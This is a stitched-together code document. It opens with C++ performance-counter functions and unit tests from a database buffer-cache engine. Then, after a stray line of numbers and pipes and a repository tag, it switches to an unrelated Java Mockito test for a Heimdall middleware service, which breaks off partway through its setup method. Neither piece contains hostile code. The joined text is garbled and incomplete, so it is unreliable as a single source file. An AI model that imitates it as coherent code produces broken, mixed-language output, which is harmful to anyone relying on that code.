LONG LBFCacheMemoryReservedMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheIMemoryReserved() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheMemoryCommittedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = CbBFICacheIMemoryCommitted();
return 0;
}
LONG LBFCacheMemoryCommittedMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( CbBFICacheIMemoryCommitted() / ( 1024 * 1024 ) );
return 0;
}
LONG LBFDehydratedBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
LONG cbf = 0;
// for now any buffer that is not the max buffer size is a dehydrated buffer;
// when we support multiple page sizes this will have to change.
for( INT icb = icbPageSmallest; icb < g_icbCacheMax; icb++ )
{
cbf += g_rgcbfCachePages[icb];
}
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = cbf;
}
return 0;
}
LONG LBFCacheSizeTargetCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = g_cacheram.GetOptimalResourcePoolSize();
}
return 0;
}
LONG LBFCacheSizeTargetMBCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = g_cacheram.GetOptimalResourcePoolSize() / ( 1024 * 1024 );
}
return 0;
}
PERFInstanceDelayedTotalWithClass< LONG, INST, 2 > cBFCache;
LONG LBFCacheSizeMBCategorizedCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( ( (ULONG_PTR)cBFCache.Get( iInstance ) * cbAveBufferSize ) / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheSizeCategorizedCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( (ULONG_PTR)cBFCache.Get( iInstance ) * cbAveBufferSize ) ;
return 0;
}
LONG LBFCacheSizeMinCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = (ULONG_PTR)UlParam( JET_paramCacheSizeMin ) * g_rgcbPageSize[g_icbCacheMax];
return 0;
}
LONG LBFCacheSizeMaxCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = (ULONG_PTR)UlParam( JET_paramCacheSizeMax ) * g_rgcbPageSize[g_icbCacheMax];
return 0;
}
LONG LBFCacheSizeResidentCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = (ULONG_PTR)g_cbfCacheResident * cbAveBufferSize;
return 0;
}
LONG LBFCacheSizeResidentMBCEFLPv( LONG iInstance, void* pvBuf )
{
// Note: This fakes the cache resident, and so may be inaccurate.
const __int64 cbAveBufferSize = CbBFIAveResourceSize();
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = ( ( (ULONG_PTR)g_cbfCacheResident * cbAveBufferSize ) / ( 1024 * 1024 ) );
return 0;
}
LONG LBFCacheSizingDurationCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (unsigned __int64*) pvBuf ) = DtickBFIMaintCacheSizeDuration() / 1000;
}
return 0;
}
__int64 g_cbCacheUnattached = 0;
LONG LBFCacheUnattachedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (unsigned __int64*) pvBuf ) = g_cbCacheUnattached;
return 0;
}
LONG LBFStartFlushThresholdCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = (ULONG)cbfAvailPoolLow;
}
return 0;
}
LONG LBFStopFlushThresholdCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = (ULONG)cbfAvailPoolHigh;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesPreread;
LONG LBFPagesPrereadCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesPreread.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPrereadStall;
LONG LBFPagePrereadStallsCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPrereadStall.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesPrereadUnnecessary;
LONG LBFPagesPrereadUnnecessaryCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesPrereadUnnecessary.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesDehydrated;
LONG LBFPagesDehydratedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesDehydrated.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesRehydrated;
LONG LBFPagesRehydratedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesRehydrated.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesVersioned;
LONG LBFPagesVersionedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesVersioned.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesVersionCopied;
LONG LBFPagesVersionCopiedCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesVersionCopied.PassTo( iInstance, pvBuf );
return 0;
}
LONG g_cBFVersioned;
LONG LBFVersionedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*( (ULONG*) pvBuf ) = g_cBFVersioned;
}
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesRepeatedlyWritten;
LONG LBFPagesRepeatedlyWrittenCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesRepeatedlyWritten.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedCacheShrink;
LONG LBFPagesFlushedCacheShrinkCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedCacheShrink.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedCheckpoint;
LONG LBFPagesFlushedCheckpointCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedCheckpoint.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedCheckpointForeground;
LONG LBFPagesFlushedCheckpointForegroundCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedCheckpointForeground.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedContextFlush; // needed for OSTrace
LONG LBFPagesFlushedContextFlushCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedContextFlush.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedFilthyForeground;
LONG LBFPagesFlushedFilthyForegroundCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedFilthyForeground.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedAvailPool;
LONG LBFPagesFlushedAvailPoolCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedAvailPool.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedScavengeSuperColdInternal;
LONG LBFPagesFlushedScavengeSuperColdInternalCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedScavengeSuperColdInternal.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedScavengeSuperColdUser;
LONG LBFPagesFlushedScavengeSuperColdUserCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedScavengeSuperColdUser.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedOpportunely;
LONG LBFPagesFlushedOpportunelyCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedOpportunely.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesFlushedOpportunelyClean;
LONG LBFPagesFlushedOpportunelyCleanCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesFlushedOpportunelyClean.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesCoalescedWritten;
LONG LBFPagesCoalescedWrittenCEFLPv( LONG iInstance, void * pvBuf )
{
cBFPagesCoalescedWritten.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesCoalescedRead;
LONG LBFPagesCoalescedReadCEFLPv( LONG iInstance, void * pvBuf )
{
cBFPagesCoalescedRead.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFPageHistoryCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CHistoryRecord() : 0;
return 0;
}
LONG LBFPageHistoryHitsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CHistoryHit() : 0;
return 0;
}
LONG LBFPageHistoryReqsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CHistoryRequest() : 1;
return 0;
}
LONG LBFPageScannedOutOfOrderCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CResourceScannedOutOfOrder() : 0;
return 0;
}
LONG LBFPageScannedMovesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CResourceScannedMoves() : 0;
return 0;
}
LONG LBFPageScannedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CResourceScanned() : 1;
return 0;
}
LONG LRESMGRScanFoundEntriesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanEnumeratedEntries() : 1;
return 0;
}
LONG LRESMGRScanBucketsScannedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanBucketsScanned() : 1;
return 0;
}
LONG LRESMGRScanEmptyBucketsScannedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanEmptyBucketsScanned() : 1;
return 0;
}
LONG LRESMGRScanIdRangeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.CLastScanEnumeratedIDRange() : 1;
return 0;
}
LONG LRESMGRScanTimeRangeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_bflruk.DtickLastScanEnumeratedRange() : 1;
return 0;
}
LONG LRESMGRCacheLifetimeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedIndexTarget(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeHWCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedIndexTargetHW(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeMaxCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstFoundNormal(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeEstVarCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? LFunctionalMax( g_bflruk.DtickScanFirstEvictedIndexTargetVar(), 0 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeK1CEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedTouchK1(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRCacheLifetimeK2CEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? ( ( LFunctionalMax( g_bflruk.DtickScanFirstEvictedTouchK2(), 0 ) + 500 ) / 1000 ) : 0;
}
return 0;
}
LONG LRESMGRScanFoundToEvictRangeCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.DtickFoundToEvictDelta() : 0;
}
return 0;
}
LONG LRESMGRSuperColdedResourcesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.CSuperColdedResources() : 0;
}
return 0;
}
LONG LRESMGRSuperColdAttemptsCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.CSuperColdAttempts() : 0;
}
return 0;
}
LONG LRESMGRSuperColdSuccessesCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
*((LONG*)pvBuf) = g_fBFInitialized ? g_bflruk.CSuperColdSuccesses() : 0;
}
return 0;
}
LONG LBFResidentBuffersCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_cbfCacheResident : 0;
return 0;
}
LONG LBFMemoryEvictCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( (ULONG*) pvBuf ) = g_fBFInitialized ? g_cacheram.CpgReclaim() + g_cacheram.CpgEvict() : 0;
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFPagesRepeatedlyRead;
LONG LBFPagesRepeatedlyReadCEFLPv( LONG iInstance, void* pvBuf )
{
cBFPagesRepeatedlyRead.PassTo( iInstance, pvBuf );
return 0;
}
LONG LBFOpportuneWriteIssuedCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
*( ( ULONG* )pvBuf ) = cBFOpportuneWriteIssued;
return 0;
}
PERFInstanceDelayedTotal< LONG, INST, fFalse > cBFCheckpointMaintOutstandingIOMax;
LONG LCheckpointMaintOutstandingIOMaxCEFLPv( LONG iInstance, void* pvBuf )
{
if ( pvBuf )
{
cBFCheckpointMaintOutstandingIOMax.PassTo( iInstance, pvBuf );
}
return 0;
}
PERFInstanceLiveTotalWithClass<QWORD> cBFCacheMissLatencyTotalTicksAttached;
LONG LBFCacheMissLatencyTotalTicksAttachedCEFLPv( LONG iInstance, VOID * pvBuf )
{
cBFCacheMissLatencyTotalTicksAttached.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheMissLatencyTotalOperationsAttached;
LONG LBFCacheMissTotalAttachedCEFLPv( LONG iInstance, VOID * pvBuf )
{
cBFCacheMissLatencyTotalOperationsAttached.PassTo( iInstance, pvBuf );
return 0;
}
PERFInstanceLiveTotalWithClass<> cBFCacheUnused;
LONG LBFCacheSizeUnusedCEFLPv( LONG iInstance, void* pvBuf )
{
// NOTE: we can use g_rgcbPageSize[g_icbCacheMax] here because unused pages are never dehydrated
if ( pvBuf )
*( (unsigned __int64*)pvBuf ) = ( (ULONG_PTR)cBFCacheUnused.Get( iInstance ) * g_rgcbPageSize[g_icbCacheMax] );
return 0;
}
#endif // PERFMON_SUPPORT
#ifdef ENABLE_JET_UNIT_TEST
// BFPriority Unit Testing
//
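// These tests exercise BfpriBFMake(), which packs a cache-priority percentage (0 - 1000) and a
// BFTEMPOSFILEQOS value into a single bfpri; PctBFCachePri() and QosBFUserAndIoPri() unpack the
// two halves. Out-of-range inputs assert in retail builds but are fed in here to verify that the
// bit masking degrades predictably.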
JETUNITTEST( BF, BFPriorityBasicResourcePriority )
{
CHECK( 0 == PctBFCachePri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 1 == PctBFCachePri( BfpriBFMake( 1, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 10 == PctBFCachePri( BfpriBFMake( 10, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 100 == PctBFCachePri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 1000 == PctBFCachePri( BfpriBFMake( 1000, (BFTEMPOSFILEQOS)0x0 ) ) );
// Bad values that assert in BfpriBFMake() - in ese.dll / ifndef ENABLE_JET_UNIT_TEST
CHECK( 1001 == PctBFCachePri( BfpriBFMake( 1001, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 1023 == PctBFCachePri( BfpriBFMake( 1023, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 0 == PctBFCachePri( BfpriBFMake( 1024, (BFTEMPOSFILEQOS)0x0 ) ) ); // overflow
CHECK( 1023 == PctBFCachePri( BfpriBFMake( 0xFFFFFFFF, (BFTEMPOSFILEQOS)0x0 ) ) );
CHECK( 0 == QosBFUserAndIoPri( BfpriBFMake( 0xFFFFFFFF, (BFTEMPOSFILEQOS)0x0 ) ) ); // overflow shouldn't corrupt other values.
}
JETUNITTEST( BF, BFPriorityBasicIoDispatchPriority )
{
CHECK( 0 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0 ) ) );
CHECK( qosIODispatchBackground == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)qosIODispatchBackground ) ) );
CHECK( qosIODispatchImmediate == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)qosIODispatchImmediate ) ) );
// It's artificial to test with ResourcePriority = 0% above, so re-test with 100%.
CHECK( 0 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0 ) ) );
CHECK( qosIODispatchBackground == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)qosIODispatchBackground ) ) );
CHECK( qosIODispatchImmediate == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)qosIODispatchImmediate ) ) );
}
JETUNITTEST( BF, BFPriorityBasicUserTagPriority )
{
CHECK( 0x40000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x40000000 ) ) ); // Tag for Maintenance
CHECK( 0x01000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x01000000 ) ) ); // User Pri = 1
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x0F000000 ) ) ); // User Pri = 15
CHECK( 0x4F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x4F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
// Values that assert in BfpriBFMake() like they should in ese.dll / ifndef ENABLE_JET_UNIT_TEST
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x1F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0x2F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
CHECK( 0x4F007F72 == QosBFUserAndIoPri( BfpriBFMake( 0, (BFTEMPOSFILEQOS)0xFFFFFFFF ) ) ); // Full overflow, only misc bits should survive.
// It's artificial to test with ResourcePriority = 0% above, so re-test with 100%.
CHECK( 0x40000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x40000000 ) ) ); // Tag for Maintenance
CHECK( 0x01000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x01000000 ) ) ); // User Pri = 1
CHECK( 0x0F000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x0F000000 ) ) ); // User Pri = 15
CHECK( 0x4F000000 == QosBFUserAndIoPri( BfpriBFMake( 100, (BFTEMPOSFILEQOS)0x4F000000 ) ) ); // User Pri = 15, +Tag for Maintenance
}
JETUNITTEST( BF, BFPriorityMaxEdgeCases )
{
BFTEMPOSFILEQOS qosWorst = (BFTEMPOSFILEQOS)( 0x4F000000 | qosIODispatchMask | qosIOOSLowPriority );
wprintf( L"\n\t\t BfpriBFMake( 1000%%, qosWorst = 0x%I64x ) -> bfpri = 0x%x ( bfpriFaultIoPriorityMask = 0x%x ).\n",
(QWORD)qosWorst, BfpriBFMake( 1000, qosWorst ), bfpriFaultIoPriorityMask );
CHECK( 1000 == PctBFCachePri( BfpriBFMake( 1000, qosWorst ) ) );
CHECK( qosWorst == QosBFUserAndIoPri( BfpriBFMake( 1000, qosWorst ) ) );
}
// Atomic bit field unit tests.
//
JETUNITTEST( BF, AtomicBitFieldSet )
{
BF bf;
// Initially, all unset.
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set FDependentPurged.
bf.bfbitfield.SetFDependentPurged( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFDependentPurged( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set FImpedingCheckpoint.
bf.bfbitfield.SetFImpedingCheckpoint( fTrue );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFImpedingCheckpoint( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set FRangeLocked.
bf.bfbitfield.SetFRangeLocked( fTrue );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFRangeLocked( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
}
JETUNITTEST( BF, AtomicBitFieldReset )
{
BF bf;
// Initially, all unset.
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
// Set them all.
bf.bfbitfield.SetFDependentPurged( fTrue );
bf.bfbitfield.SetFImpedingCheckpoint( fTrue );
bf.bfbitfield.SetFRangeLocked( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
// Reset FDependentPurged.
bf.bfbitfield.SetFDependentPurged( fFalse );
CHECK( !bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFDependentPurged( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
// Reset FImpedingCheckpoint.
bf.bfbitfield.SetFImpedingCheckpoint( fFalse );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( !bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFImpedingCheckpoint( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
// Reset FRangeLocked.
bf.bfbitfield.SetFRangeLocked( fFalse );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( !bf.bfbitfield.FRangeLocked() );
bf.bfbitfield.SetFRangeLocked( fTrue );
CHECK( bf.bfbitfield.FDependentPurged() );
CHECK( bf.bfbitfield.FImpedingCheckpoint() );
CHECK( bf.bfbitfield.FRangeLocked() );
}
#endif // ENABLE_JET_UNIT_TEST
| 464,914 |
419 |
<reponame>limasigor2/heimdall
package br.com.conductor.heimdall.core.service;
/*-
* =========================LICENSE_START==================================
* heimdall-core
* ========================================================================
* Copyright (C) 2018 Conductor Tecnologia SA
* ========================================================================
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* ==========================LICENSE_END===================================
*/
import br.com.conductor.heimdall.core.converter.GenericConverter;
import br.com.conductor.heimdall.core.dto.MiddlewareDTO;
import br.com.conductor.heimdall.core.dto.PageableDTO;
import br.com.conductor.heimdall.core.dto.page.MiddlewarePage;
import br.com.conductor.heimdall.core.entity.Api;
import br.com.conductor.heimdall.core.entity.Interceptor;
import br.com.conductor.heimdall.core.entity.Middleware;
import br.com.conductor.heimdall.core.enums.Status;
import br.com.conductor.heimdall.core.enums.TypeInterceptor;
import br.com.conductor.heimdall.core.environment.Property;
import br.com.conductor.heimdall.core.environment.Property.Middlewares;
import br.com.conductor.heimdall.core.exception.NotFoundException;
import br.com.conductor.heimdall.core.repository.ApiRepository;
import br.com.conductor.heimdall.core.repository.InterceptorRepository;
import br.com.conductor.heimdall.core.repository.MiddlewareRepository;
import br.com.conductor.heimdall.core.service.amqp.AMQPMiddlewareService;
import br.com.conductor.heimdall.core.util.Pageable;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import org.junit.runner.RunWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.runners.MockitoJUnitRunner;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.core.convert.converter.Converter;
import org.springframework.data.domain.Example;
import org.springframework.data.domain.Page;
import org.springframework.data.domain.Sort;
import org.springframework.mock.web.MockMultipartFile;
import java.io.IOException;
import java.time.LocalDateTime;
import java.time.Month;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
import static org.junit.Assert.*;
@RunWith(MockitoJUnitRunner.class)
public class MiddlewareServiceTest {
@InjectMocks
private MiddlewareService service;
@Mock
private MiddlewareRepository middlewareRepository;
@Mock
private ApiRepository apiRepository;
@Mock
private InterceptorRepository interceptorRepository;
@Mock
private AMQPMiddlewareService amqpMiddlewareService;
@Mock
private Property property;
@Value("${zuul.filter.root}")
private String root;
@Rule
public ExpectedException thrown = ExpectedException.none();
private Api api;
private List<Middleware> middlewareList;
private List<Interceptor> interceptors = new ArrayList<>();
private Middleware m1, m2, m3, m4, m5, middleware;
private Middlewares middlewareProperty;
private MiddlewareDTO middlewareDTO;
private MockMultipartFile multipartFile;
@Before
public void setUp() throws Exception {
api = new Api();
api.setId(10L);
multipartFile = new MockMultipartFile("artifact", "strongbox-validate-8.1.jar",
"application/octet-stream", "some content".getBytes());
m1 = new Middleware();
m1.setStatus(Status.ACTIVE);
m1.setApi(api);
m1.setId(10L);
m1.setCreationDate(LocalDateTime.of(2017, Month.JULY, 29, 19, 30, 40));
m1.setFile(multipartFile.getBytes());
m2 = new Middleware();
m2.setStatus(Status.INACTIVE);
m2.setApi(api);
m2.setId(20L);
m2.setCreationDate(LocalDateTime.of(2016, Month.JULY, 29, 19, 30, 40));
m2.setFile(multipartFile.getBytes());
m3 = new Middleware();
m3.setStatus(Status.INACTIVE);
m3.setApi(api);
m3.setId(30L);
m3.setCreationDate(LocalDateTime.of(2015, Month.JULY, 29, 19, 30, 40));
m3.setFile(multipartFile.getBytes());
m4 = new Middleware();
m4.setStatus(Status.DEPRECATED);
m4.setApi(api);
m4.setId(40L);
m4.setCreationDate(LocalDateTime.of(2014, Month.JULY, 29, 19, 30, 40));
m4.setFile(multipartFile.getBytes());
m5 = new Middleware();
m5.setStatus(Status.DEPRECATED);
m5.setApi(api);
m5.setId(50L);
m5.setCreationDate(LocalDateTime.of(2013, Month.JULY, 29, 19, 30, 40));
